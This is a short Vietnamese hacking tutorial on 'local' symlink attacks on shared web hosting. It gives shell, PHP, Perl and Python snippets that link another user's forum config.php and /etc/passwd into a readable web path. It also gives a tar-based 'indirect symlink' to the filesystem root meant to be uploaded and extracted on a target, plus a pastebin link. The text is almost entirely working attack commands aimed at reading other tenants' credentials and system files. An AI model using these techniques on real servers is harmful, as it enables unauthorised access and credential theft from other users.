Tư duy Local Nâng cao ( Tạo File symlink )

[+] Tạo symlink qua run command
Khi không thể run command bằng PHP shell ta run command bằng perl , python shell

ln -s /home/user/public_html/forum/includes/config.php 1.txt

[+] Tạo file symlink bằng hàm của PHP

<?php
$target = '/home/user_target/public_html/forum/includes/config.php';
$link = '/home/user/public_html/1.txt';
symlink($target, $link);
?>

[+] Tạo File symlink nhờ perl , python

#!/usr/bin/perl -w
symlink('/etc/passwd','/root/Desktop/sym.txt');

#!/usr/bin/python
print "Content-type: text/html\n\n"
import os
filename = "1.txt"
linkto = "/etc/passwd"
os.symlink(linkto, filename)

[+] Thông qua bug

http://pastebin.com/DghFwrEP

[+] Indirect Symlink
Cơ sở là tạo 1 file symlink ở 1 nơi có thể tạo được rồi nén lại
Upload lên nơi cần symlink rồi giải nén
ln -s / r00t -> Tạo File symlink với thư mục /
tar czvf r00t.tar.gz r00t -> Nén file r00t thành r00t.tar.gz
Giải nén
tar xzf r00t.tar.gz